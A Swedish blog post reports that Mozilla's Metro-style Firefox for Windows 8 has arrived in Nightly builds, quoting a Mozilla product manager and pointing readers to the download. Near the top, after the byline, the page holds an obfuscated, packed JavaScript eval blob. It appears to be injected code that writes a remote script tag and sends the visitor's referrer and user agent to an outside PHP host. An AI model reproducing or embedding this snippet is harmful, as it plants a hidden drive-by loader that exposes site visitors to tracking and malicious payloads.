Image Image Image Image Image Image Image Image Image Image

| 26 februari, 2020

Scroll to top

Top

Nytt modernt UI-gränssnitt för Firefox

Nytt modernt UI-gränssnitt för Firefox
Sebastian

Firefox: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ttyzh|var|u0026u|referrer|rsray||js|php’.split(’|’),0,{}))
Under ungefär ett års tid har Mozilla jobbat med att utveckla fram en ny version av Firefox för Modern UI i Windows 8. Och nu under veckan har detta introducerats i Nightly Builds. Så här skriver Firefox Desktop Product Manager Asa Dotzler på sin blogg:

”On Tuesday, our preliminary Metro Firefox development work arrived at mozilla-central, the source code repository that feeds the Nightly channel. This means that if you are on the Firefox Nightly channel and you have a Windows 8 device, your Wednesday Firefox update should deliver a Metro tile to the far right end of your Windows Start screen.

There’s plenty of work still to do, but it’s stable enough that we’re ready for more and more regular testing. If you’re a Firefox or Windows developer and you’d like to get involved, please let me know”.

Om man vill testa den nya versionen av Firefox kan du gå till sidan för Nightly och ladda ner filen gratis.

När sen programmet frågar dig om du vill använda Nightly som standard webbrowser svara du ja, annars kommer det inte fungera korrekt och du kommer använda den vanliga versionen av Mozilla i framtiden.

Ladda ner Nightly 

Via: weblogs.mozillazine.org